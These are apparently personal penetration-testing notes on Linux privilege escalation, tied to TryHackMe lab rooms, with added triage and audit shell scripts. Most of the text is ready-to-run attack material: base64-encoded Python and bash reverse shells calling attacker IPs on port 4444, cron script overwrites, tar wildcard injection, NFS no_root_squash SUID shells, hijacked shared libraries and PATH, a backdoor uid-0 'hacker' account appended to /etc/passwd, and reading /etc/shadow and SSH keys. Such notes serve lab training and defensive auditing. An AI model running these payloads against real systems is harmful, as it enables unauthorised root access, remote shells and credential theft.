
Privilege Escalation

PrivEsc: Exploits


  1. Identify the kernel version and distribution: uname -a, cat /proc/version, cat /etc/os-release
  2. Search for an exploit that matches that exact kernel version (searchsploit, exploit-db); kernel exploits are version-specific, so compare the version string carefully
  3. Compile and run the exploit, ideally after testing it on a matching VM: a failed kernel exploit can crash the target, so keep it as a last resort

PrivEsc: Sudo


  1. sudo -l (which commands the current user may run as root or as another user, and whether a password is required)
  2. Look up every allowed binary on https://gtfobins.github.io/
  3. Leverage LD_PRELOAD when sudo -l shows env_keep+=LD_PRELOAD (see PrivEsc: Ld_preload)
  4. If the user can run a script as another user: sudo -u <user-name> /opt/script/script.sh
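Added example, not from the original notes: a small triage of the `sudo -l` output from step 1. It separates NOPASSWD entries from ones that still prompt for our password, records which user each command runs as, flags `env_keep+=LD_PRELOAD` in the Defaults line, and lists the basenames to look up on GTFOBins. The sample output is constructed (user `karen`, the host and the three commands are made up); on a target feed it `sudo -l 2>&1`.

```sh
#!/bin/sh
# Added example, not from the original notes. The sample `sudo -l` output is
# constructed: user, host and commands are made up for illustration.
SAMPLE_SUDO_L='Matching Defaults entries for karen on this host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User karen may run the following commands on this host:
    (ALL : ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/nmap
    (bob) NOPASSWD: /opt/script/script.sh'

# triage_sudo_l TEXT
# Prints one finding per line:
#   LD_PRELOAD-KEPT                  Defaults keep LD_PRELOAD through sudo
#   NOPASSWD (<runas>) <command>     runs without a password prompt
#   PASSWD   (<runas>) <command>     runs as <runas>, asks for our password
triage_sudo_l() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        case "$line" in
            *env_keep*LD_PRELOAD*)
                echo "LD_PRELOAD-KEPT"
                ;;
            *'('*')'*)
                rest=${line#*\(}          # drop everything up to "("
                runas=${rest%%\)*}        # "ALL : ALL", "root", "bob"
                cmd=${rest#*\)}           # text after ")"
                cmd=${cmd# }              # trim the single leading space
                kind=PASSWD
                case "$cmd" in
                    NOPASSWD:*) kind=NOPASSWD; cmd=${cmd#NOPASSWD:}; cmd=${cmd# } ;;
                esac
                echo "$kind ($runas) $cmd"
                ;;
        esac
    done
}

# gtfobins_names TEXT
# Basenames of the allowed commands, one per line, for the GTFOBins lookup.
gtfobins_names() {
    triage_sudo_l "$1" | grep -E '^(NOPASSWD|PASSWD) ' |
    while read -r _kind rest; do
        cmd=${rest#*\) }                  # strip "(runas) "
        basename "${cmd%% *}"             # first word only, no arguments
    done | sort -u
}

triage_sudo_l "$SAMPLE_SUDO_L"
gtfobins_names "$SAMPLE_SUDO_L"
```

Wildcards, negations and `sudoedit` entries appear in the same `(runas) command` shape and are listed like any other command; read them by hand before acting on them.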

PrivEsc: root


su root   # only works if the root password is known: found on the box, reused from another account or cracked
|<- root

PrivEsc: Pass


  1. check ls -la /etc/passwd, cat /etc/passwd and ls -la /etc/shadow - for hashes stored in passwd, a readable shadow or a writable passwd
  2. check history files (~/.bash_history, ~/.mysql_history, ~/.python_history) - for passwords typed on the command line
  3. check /var/backups/ - for old copies of passwd and shadow and other backups containing passwords
  4. check each directory under /home - for config files, SSH keys and passwords
  5. check running processes, passwords are sometimes passed as arguments: watch -n 1 "ps aux | grep pass"
  6. check local tcp traffic (needs root or capture rights): sudo tcpdump -i lo -A | grep "pass"

PrivEsc: SUID


If the SUID bit is set, the binary runs with the permissions of the file owner (as root for root-owned files); look each result up on https://gtfobins.github.io/. The commands below are equivalent ways to list SUID files; the last one also lists SGID files.

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

PrivEsc: Capabilities


getcap -r / 2>/dev/null
check https://gtfobins.github.io/ (cap_setuid+ep on an interpreter such as python or perl gives a root shell directly; cap_dac_read_search lets the binary read any file, e.g. /etc/shadow)

PrivEsc: Interesting groups


DISK Group

Members of disk can read and write raw block devices, which is almost root: any file on the disk can be read (and written) regardless of its permissions.

df -h #Find where "/" is mounted
debugfs /dev/sda1     # ext2/3/4 only; use the device df shows for /
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

ADM Group

  • members can read most files under /var/log; look there for interesting events, credentials and what cron runs
    grep "CRON" /var/log/cron.log
    grep "CRON" /var/log/* 2>/dev/null
    

Other

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe

PrivEsc: Ld_preload


  • sudo -l must show env_keep+=LD_PRELOAD (otherwise sudo strips the variable)
  • [[leverage-ld-preload]]: compile a shared object whose constructor calls setgid(0)/setuid(0) and execs a shell, then run sudo LD_PRELOAD=<path to the .so> <allowed-binary>

PrivEsc: Cron - Overwrite script


cat /etc/crontab
cat /etc/cron*
|->
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * *  root /home/karen/backup.sh 🔥
* * * * *  root /tmp/test.py          🔥
* * * * *  root /home/user/overwrite.sh 🔥

🔨 /home/karen/backup.sh

overwrite the file (it is writable by karen and run by root every minute)

echo '#!/bin/bash' > /home/karen/backup.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/karen/backup.sh
chmod +x /home/karen/backup.sh
# wait up to 1 min for the cron job to run
cd /tmp
./bash -p   # -p keeps the effective uid (root) instead of dropping it

🔨 /tmp/test.py

setup listener (on the attacker machine, 10.8.6.103 in the payload below; change it to your IP)

nc -lvnp 4444
overwrite file
echo "IyEvdXNyL2Jpbi9weXRob24z" | base64 -d > /tmp/test.py    # decodes to: #!/usr/bin/python3
echo "" >> /tmp/test.py 
echo "aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjguNi4xMDMiLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKQ==" | base64 -d >> /tmp/test.py    # decodes to a python reverse shell to 10.8.6.103:4444

🔨 /home/user/overwrite.sh

setup listener (on the attacker machine, 10.18.74.143 in the payload below; change it to your IP)

nc -lvnp 4444
overwrite file
echo "IyEvYmluL2Jhc2g=" | base64 -d > /home/user/overwrite.sh    # decodes to: #!/bin/bash
echo "" >> /home/user/overwrite.sh
echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE4Ljc0LjE0My80NDQ0IDA+JjE=" | base64 -d >> /home/user/overwrite.sh    # decodes to: /bin/bash -i >& /dev/tcp/10.18.74.143/4444 0>&1

PrivEsc: Cron - Overwrite path


check the cron configuration and pay attention to PATH: cron resolves bare command names through it

  • PATH starts with /home/user, a directory the user can write to
cat /etc/crontab
|->
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin <--
* * * * *  root script.sh <-

🔨 script.sh

check the location of script.sh

  • the script lives in /usr/local/bin/
  • /home/user comes earlier in the cron PATH, so a script.sh placed there is executed instead of the original
find / -name script.sh 2>/dev/null
#-> /usr/local/bin/script.sh

create a new script.sh in /home/user

echo '#!/bin/bash' > /home/user/script.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/user/script.sh
chmod +x /home/user/script.sh

wait for the cron job

cd /tmp
./bash -p

PrivEsc: PATH


  1. What folders are located under $PATH
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?
    echo $PATH
    find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
    find / -writable 2>/dev/null | grep 'home'
    export PATH=/tmp:$PATH
    

example

we have something like this

ls -la test
-rwsr-xr-x 1 root root 16712 Jun 20  2021 test
if we execute that program it returns an error: it calls a script / binary called thm that is missing
./test
sh: 1: thm: not found
we recreate the missing thm as a script with the content below, which adds a new user hacker with password hacker and uid 0
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
base64 is a great way to transfer the payload without quoting problems
echo "ZWNobyAnaGFja2VyOiQxJGhhY2tlciRUenlLbHYwL1IvYzI4Ui5HQWVMdy4xOjA6MDpIYWNrZXI6L3Jvb3Q6L2Jpbi9iYXNoJyA+PiAvZXRjL3Bhc3N3ZA==" | base64 -d > thm    # decodes to the echo line above
chmod +x thm # <- if missing
last, update PATH so the directory holding thm is searched first
echo $PATH
|->
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
export PATH=/home/murdoch:$PATH
echo $PATH
|->
/home/murdoch:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
BOOM! executing test now runs our thm as root (test is SUID root) and that appends the uid-0 user hacker to /etc/passwd
./test
su hacker
Password: hacker
root@ip-10-10-38-48:/home/murdoch#
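The checks in PrivEsc: Cron - Overwrite script, PrivEsc: Cron - Overwrite path and PrivEsc: PATH above are the same question asked of different inputs: can we write the file that is about to run, or a directory that is searched before the one that really holds it? The script below is an added example, not part of the original notes. It builds a constructed crontab and file tree under mktemp so it runs offline; the `$demo/...` paths and the script names are made up. On a target, pass /etc/crontab (or a file from /etc/cron.d) and, for the PATH case, your own `$PATH`.

```sh
#!/bin/sh
# Added example, not from the original notes. The crontab and the file tree
# are constructed under a temporary directory.

# path_hijack_dirs NAME PATHSTRING
# Print each writable directory of PATHSTRING that is searched before the
# directory where NAME really lives (every writable one if NAME is not found
# at all). A file called NAME dropped in any of them is what gets executed.
# Note: as root every directory tests writable, so run this as the low
# privileged user you are escalating from.
path_hijack_dirs() {
    name=$1
    oldifs=$IFS; IFS=:; set -- $2; IFS=$oldifs
    for dir; do
        [ -n "$dir" ] || continue
        [ -x "$dir/$name" ] && return 0      # the real binary wins from here on
        [ -w "$dir" ] && echo "$dir"
    done
    return 0
}

# check_crontab FILE
# For a system crontab (fields: m h dom mon dow user command), report:
#   WRITABLE-TARGET              the job's script itself can be overwritten
#   MISSING-TARGET-WRITABLE-DIR  the script is gone but we can create it
#   PATH-HIJACK ... via DIR      a bare command name resolves through a
#                                writable directory in the crontab's PATH
# (@reboot-style lines are not handled.)
check_crontab() {
    cron_path=$(sed -n 's/^PATH=//p' "$1" | tail -n 1)
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    while read -r _m _h _dom _mon _dow user cmd _args; do
        case "$cmd" in
            /*)
                if [ -w "$cmd" ]; then
                    echo "WRITABLE-TARGET $user $cmd"
                elif [ ! -e "$cmd" ] && [ -w "$(dirname "$cmd")" ]; then
                    echo "MISSING-TARGET-WRITABLE-DIR $user $cmd"
                fi
                ;;
            *)
                for d in $(path_hijack_dirs "$cmd" "$cron_path"); do
                    echo "PATH-HIJACK $user $cmd via $d"
                done
                ;;
        esac
    done
}

# --- constructed demo tree: a writable home first in cron's PATH, the real
# script.sh further down, a writable backup.sh and a missing tmp/test.py ---
demo=$(mktemp -d)
mkdir -p "$demo/home/user" "$demo/usr/local/bin" "$demo/tmp"
printf '#!/bin/sh\nexit 0\n' > "$demo/usr/local/bin/script.sh"
printf '#!/bin/sh\nexit 0\n' > "$demo/home/user/backup.sh"
chmod 755 "$demo/usr/local/bin/script.sh" "$demo/home/user/backup.sh"
cat > "$demo/crontab" <<EOF
# constructed /etc/crontab
SHELL=/bin/sh
PATH=$demo/home/user:$demo/usr/local/bin:/usr/bin:/bin
* * * * *  root $demo/home/user/backup.sh
* * * * *  root $demo/tmp/test.py
* * * * *  root script.sh
EOF

check_crontab "$demo/crontab"
# The same helper answers the PrivEsc: PATH question for a shell of our own:
# where could a file named thm be dropped so that it shadows the real one?
path_hijack_dirs thm "$PATH"
```

Remove the demo tree with `rm -rf "$demo"` when done. The `$PATH` line at the end prints nothing on a sanely configured host; a writable entry there (an empty element, `.`, or a home directory) is exactly the condition step 2 of the PATH checklist asks about.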

PrivEsc: TAR


Works when a job running as root archives a directory we can write to with a wildcard (tar ... * run from inside that directory): the shell expands * to the file names, and GNU tar treats file names that look like options as options. Create these files in that directory:

echo 'cp /bin/bash /tmp/bash' > runme.sh
echo 'chmod +s /tmp/bash' >> runme.sh
echo "" > "--checkpoint-action=exec=sh runme.sh"  
echo "" > --checkpoint=1
chmod +x runme.sh
# wait for the job to run, then
/tmp/bash -p
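Added example, not from the original notes: it shows the two marker files above doing their job, and the one change that defuses them. GNU tar parses anything in its argument list that starts with `--` as an option, so once the shell expands `*` the two names become `--checkpoint=1 --checkpoint-action=exec=sh runme.sh`; expanding `./*` instead yields `./--checkpoint=1`, which is only a file name. Everything is created under mktemp and a `pwned` marker stands in for the SUID copy of bash.

```sh
#!/bin/sh
# Added example, not from the original notes. Runs entirely in a temporary
# directory; "pwned" is a stand-in for the SUID bash the real payload drops.

# wildcard_demo vulnerable|safe
# Plants the marker files and runs tar the way a backup job would.
# Prints "fired" if runme.sh was executed by tar, "clean" otherwise.
wildcard_demo() {
    mode=$1
    work=$(mktemp -d)
    (
        cd "$work" || exit 1
        printf 'touch pwned\n' > runme.sh
        : > '--checkpoint-action=exec=sh runme.sh'
        : > --checkpoint=1
        : > data.txt
        if [ "$mode" = safe ]; then
            # ./* expands to ./--checkpoint=1 ...: never parsed as options
            tar cf "$work.tar" ./* 2>/dev/null || true
        else
            # * expands to --checkpoint=1 ...: GNU tar honours them
            tar cf "$work.tar" * 2>/dev/null || true
        fi
    )
    if [ -e "$work/pwned" ]; then result=fired; else result=clean; fi
    rm -rf "$work" "$work.tar"
    echo "$result"
}

echo "tar cf backup.tar *   -> $(wildcard_demo vulnerable)"
echo "tar cf backup.tar ./* -> $(wildcard_demo safe)"
```

The vulnerable run fires only with GNU tar; bsdtar and busybox tar reject the unknown option and the function reports `clean`, so a `clean` there says which tar the host has, not that the host is safe. `tar cf backup.tar -- *` has the same effect as `./*` with GNU tar.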

PrivEsc: NFS


backdoor bash

  1. [on target] run
    cat /etc/exports
    |->
    /home/backup *(rw,sync,insecure,🔥no_root_squash,no_subtree_check)
    /tmp *(rw,sync,insecure,🔥no_root_squash,no_subtree_check)
    /home/ubuntu/sharedfolder *(rw,sync,insecure,🔥no_root_squash,no_subtree_chec
    
  2. [on target] check if any share has no_root_squash

  3. [on kali] if yes mount that share

    mkdir -p /tmp/nfs_hacked
    sudo mount -t nfs $IP:/tmp /tmp/nfs_hacked
    
    $IP - ip of target machine

  4. [on target] - copy bash

    cd /tmp
    cp /bin/bash .
    ls -la
    |->
    -rwxr-xr-x  1 karen karen 1183448 Jun 17 12:50 bash
    

  5. [on kali] - set new owner and +s bit

    cd /tmp/nfs_hacked
    sudo su
    chown root:root bash
    chmod +s bash
    chmod +x bash
    

  6. [on target] - execute bash

    cd /tmp
    ls -la
    |->
    -rwsr-sr-x  1 root  root  1183448 Jun 17 12:50 bash
    
    ./bash -p
    # BOOM we have root
    

  7. clean

    sudo umount /tmp/nfs_hacked
    

create malicious nfs binary

  1. run
    cat /etc/exports
    
  2. check if any share has no_root_squash
  3. if yes mount that share
    mkdir -p /tmp/nfs_hacked
    sudo mount -t nfs $IP:/home /tmp/nfs_hacked
    
  4. create nfs.c in that share (on kali, as root, so the binary ends up owned by root on the server too)

    #include <stdlib.h>
    #include <unistd.h>

    int main() 
    {
       setgid(0);
       setuid(0);
       system("/bin/bash");
       return 0;
    }
    

  5. compile

    sudo su
    gcc nfs.c -o nfs -w   # if the target's libc differs, add -static, or compile on the target and only chown/chmod the file from here
    chmod +s nfs
    

  6. on the target, run the binary from the share's local path (the share mounted above is /home, so /home/nfs); it executes as root

  7. clean

    sudo umount /tmp/nfs_hacked
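Added example, not from the original notes: step 2 of both NFS procedures above as a script. It parses an exports(5) file and reports which shares allow the trick (rw together with no_root_squash, so a file chowned root and chmod +s over the mount keeps those bits on the server). The exports file below is constructed; on a target read /etc/exports, or `showmount -e $IP` from kali, which lists the paths but not the options.

```sh
#!/bin/sh
# Added example, not from the original notes. The exports file is
# constructed; on a target pass the contents of /etc/exports.
EXPORTS_SAMPLE='# constructed /etc/exports
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/ro 10.0.0.0/24(ro,sync,no_root_squash)
/srv/rw 10.0.0.0/24(rw,sync)'

# nfs_exports_triage TEXT
# One line per (path, client) pair. EXPLOITABLE means rw plus no_root_squash.
# root_squash is the default, so an export without the option maps our
# root on the client to nobody and the chown/chmod +s on the mount fails.
nfs_exports_triage() (
    set -f      # "*" is an NFS client wildcard here, never a file glob
    printf '%s\n' "$1" | grep -Ev '^[[:space:]]*(#|$)' |
    while read -r path specs; do
        for spec in $specs; do
            case "$spec" in
                *'('*')') host=${spec%%\(*}; opts=${spec#*\(}; opts=${opts%\)} ;;
                *)        host=$spec; opts='' ;;
            esac
            [ -n "$host" ] || host='*'
            rw=no; squash=on
            case ",$opts," in *,rw,*) rw=yes ;; esac
            case ",$opts," in *,no_root_squash,*) squash=off ;; esac
            if [ "$rw" = yes ] && [ "$squash" = off ]; then
                verdict=EXPLOITABLE
            else
                verdict=ok
            fi
            echo "$verdict $path $host rw=$rw root_squash=$squash"
        done
    done
)

nfs_exports_triage "$EXPORTS_SAMPLE"
```

A host field of `*` means any client can mount the share, which is the case in the notes above; a network such as 10.0.0.0/24 means kali must sit in that range (or spoof into it) for the mount in step 3 to succeed.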
    

PrivEsc: Writable files


/etc/passwd

ls -la /etc/passwd   # writable by us? then a hash placed in the second field is used instead of /etc/shadow
Generate a password hash with one of the following commands.
openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Add a user hacker with uid 0 (root) to passwd
echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
# with the hash of "hacker" used in the PATH section above:
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
su hacker
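Added example, not from the original notes: the check to run on /etc/passwd before and after this technique. It reports whether the file is writable, any account carrying a hash (or no password at all) in the second field instead of `x`, and any uid-0 account that is not root, which is what the appended `hacker` line looks like to the next person who reads the file. The passwd content is constructed; pass /etc/passwd on a real host.

```sh
#!/bin/sh
# Added example, not from the original notes. The passwd content is
# constructed; the "hacker" line is the one appended in the notes above.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
karen:x:1001:1001::/home/karen:/bin/bash
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
svc:x:0:0:svc:/root:/bin/bash
guest::1002:1002::/home/guest:/bin/sh'

# audit_passwd FILE
# Reports what an attacker looks for and a defender should never see:
#   WRITABLE        we can append our own uid-0 line
#   HASH-IN-PASSWD  a hash in field 2 overrides /etc/shadow for that account
#   EMPTY-PASSWORD  field 2 empty: no password needed at all
#   EXTRA-UID0      a uid-0 account that is not root
audit_passwd() {
    [ -w "$1" ] && echo "WRITABLE $1"
    while IFS=: read -r user pw uid _gid _gecos _home _shell; do
        [ -n "$user" ] || continue
        case "$pw" in
            '')          echo "EMPTY-PASSWORD $user" ;;
            x|'*'|'!'*)  ;;                     # shadowed or locked: normal
            *)           echo "HASH-IN-PASSWD $user" ;;
        esac
        if [ "$uid" = 0 ] && [ "$user" != root ]; then
            echo "EXTRA-UID0 $user"
        fi
    done < "$1"
}

PASSWD_FILE=$(mktemp)
printf '%s\n' "$PASSWD_SAMPLE" > "$PASSWD_FILE"
audit_passwd "$PASSWD_FILE"
```

On the constructed file this prints WRITABLE (we own the temp file), HASH-IN-PASSWD and EXTRA-UID0 for hacker, EXTRA-UID0 for svc and EMPTY-PASSWORD for guest. The same loop works on /etc/shadow for the empty-field check if that file happens to be readable.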

PrivEsc: Hijack shared library


find all binaries with the SUID bit

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s
for each interesting finding, trace the files it tries to open (strace records system calls, not a stack trace; look for open/access calls that fail)
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
#-> open("/lib/libc.so.6", O_RDONLY)        = 3
#-> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
- the shared library /home/user/.config/libcalc.so is missing and the directory belongs to us, so we supply it; a constructor function runs as soon as the library is loaded, before main, with the SUID process's privileges
mkdir -p /home/user/.config && cd /home/user/.config
echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo '    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c
compile
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
execute binary
/usr/local/bin/suid-so
whoami
#-> root

PrivEsc: Hijack service


find all binaries with the SUID bit

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
for each interesting finding, look at the strings for commands it runs
strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start     <- -------------------------- TARGET (no absolute path, so it is resolved through our PATH)
create a malicious service binary
echo '#include <stdlib.h>' > /tmp/service.c
echo '#include <unistd.h>' >> /tmp/service.c
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >> /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service
update path
export PATH=/tmp:$PATH
execute
/usr/local/bin/suid-env
whoami
#-> root
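Added example, not from the original notes: a stand-in for the `strings | grep` step above that filters the noise automatically. It extracts the printable runs from a binary the way `strings` does and keeps only the ones whose first word is a command that resolves through PATH, i.e. is written without a slash; those are the candidates for `export PATH=/tmp:$PATH`, while an absolute path such as `/usr/sbin/service` is skipped because PATH is never consulted for it. The "binary" is a constructed blob of bytes imitating the output above; on a target pass the SUID file itself.

```sh
#!/bin/sh
# Added example, not from the original notes. The "binary" is a constructed
# byte blob that imitates the strings output in the notes above.
FAKE_BIN=$(mktemp)
printf '\177ELF\002\001\001\000\000\000fffff.\000l$ L\000t$(L\000|$0H\000service apache2 start\000ls -la /var/log\000/usr/sbin/service apache2 start\000' > "$FAKE_BIN"

# relative_commands_in_binary FILE
# Print the printable strings (4+ bytes, like `strings`) whose first word is
# a command found through PATH. Strings whose first word contains a slash
# are dropped: PATH is not consulted for them, so PATH hijacking cannot help.
relative_commands_in_binary() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '^.{4,}$' |
    while read -r first rest; do
        case "$first" in
            */*) continue ;;          # absolute or relative path: not PATH-resolved
        esac
        if command -v "$first" >/dev/null 2>&1; then
            echo "$first${rest:+ $rest}"
        fi
    done
}

relative_commands_in_binary "$FAKE_BIN"
```

Whether `service apache2 start` is reported depends on the machine you run this on: `command -v` only knows the commands installed there, which is the right behaviour for a check run on the target but means the line disappears on a host without `service`. Opcode fragments such as `t$(L` never resolve and fall out on their own.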

PrivEsc: Hijack service path


find all binaries with the SUID bit

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2
for each interesting finding, look at the strings for commands it runs
strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET (absolute path, so PATH does not help; an exported bash function with that exact name does)
requires bash older than 4.2-048 (check with bash --version): newer versions refuse to import exported functions whose name contains a slash
create malicious function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
execute
/usr/local/bin/suid-env2
whoami
#-> root


  • https://tryhackme.com/room/linprivesc
  • https://tryhackme.com/room/linuxprivescarena